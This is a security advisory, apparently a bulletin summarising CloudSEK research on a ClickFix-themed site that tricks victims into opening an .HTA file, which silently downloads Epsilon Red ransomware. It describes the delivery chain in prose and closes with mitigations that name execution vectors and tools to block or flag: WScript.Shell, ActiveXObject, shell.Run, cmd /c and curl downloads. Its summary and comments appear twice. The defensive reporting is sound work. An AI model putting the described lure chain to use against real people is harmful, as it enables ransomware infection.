Threat Actors Lure Victims Into Downloading .HTA Files Using ClickFix To Spread Epsilon Red Ransomwa
Summary:
CloudSEK’s TRIAD recently uncovered a Clickfix-themed malware delivery site associated with the Epsilon Red ransomware. Unlike previous Clickfix campaigns, this site directed victims to a secondary page instead of copying malicious commands to the clipboard after clicking on the “verify you are human” button. From here, the second page instructs the victim to save and open a .HTA file, containing malicious shell commands that are silently executed using ActiveX. Researchers note that one of these shell commands is designed to navigate to the victim’s user profile directory and download the payload (Epsilon Red Ransomware) from an attacker-controlled IP. In this case, the payload is downloaded discreetly, without any visible prompts or warnings for the victim, reducing the likelihood of detection.
Security Officer Comments:
Epsilon Red ransomware was first identified in 2021. While the ransomware gang’s ransom note styling resembles that of REVil ransomware, the two groups remain distinct in their tactics and infrastructure. According to researchers, Epsilon Red actors are impersonating trusted services like Discord Captcha Bot, Kick, and Twitch to deliver windows payloads using Clickfix. By mimicking such services, this increases the likelihood of successfully social engineering victims. Overall, the employment of ActiveX, a legacy technology that enables remote code execution directly from browser sessions, effectively bypasses traditional download protections in place. Furthermore, the use of windows supported files like .HTA makes detection all the more challenging, contributing to the success of such campaigns.
Suggested Corrections:
https://www.cloudsek.com/blog/threa...ing-clickfix-to-spread-epsilon-red-ransomware
CloudSEK’s TRIAD recently uncovered a Clickfix-themed malware delivery site associated with the Epsilon Red ransomware. Unlike previous Clickfix campaigns, this site directed victims to a secondary page instead of copying malicious commands to the clipboard after clicking on the “verify you are human” button. From here, the second page instructs the victim to save and open a .HTA file, containing malicious shell commands that are silently executed using ActiveX. Researchers note that one of these shell commands is designed to navigate to the victim’s user profile directory and download the payload (Epsilon Red Ransomware) from an attacker-controlled IP. In this case, the payload is downloaded discreetly, without any visible prompts or warnings for the victim, reducing the likelihood of detection.
Security Officer Comments:
Epsilon Red ransomware was first identified in 2021. While the ransomware gang’s ransom note styling resembles that of REVil ransomware, the two groups remain distinct in their tactics and infrastructure. According to researchers, Epsilon Red actors are impersonating trusted services like Discord Captcha Bot, Kick, and Twitch to deliver windows payloads using Clickfix. By mimicking such services, this increases the likelihood of successfully social engineering victims. Overall, the employment of ActiveX, a legacy technology that enables remote code execution directly from browser sessions, effectively bypasses traditional download protections in place. Furthermore, the use of windows supported files like .HTA makes detection all the more challenging, contributing to the success of such campaigns.
Suggested Corrections:
- Disable ActiveX and Windows Script Host (WSH): Enforce Group Policies to block legacy script execution vectors (WScript.Shell, ActiveXObject) in all environments.
- Threat Feed Integration and IP Blocking: Proactively ingest threat intel to blacklist known attacker IPs and domains, as well as IOFAs(Indicators of Future Attack) tied to Clickfix campaigns.
- Endpoint Behavior Analytics: Deploy EDR rules to flag hidden executions (shell.Run, cmd /c, silent downloads via curl) and suspicious child process creation from browsers.
- Security Awareness Training: Simulate attacks that impersonate familiar services (e.g., Discord bots, Twitch) to condition users against interacting with fake verification pages.
https://www.cloudsek.com/blog/threa...ing-clickfix-to-spread-epsilon-red-ransomware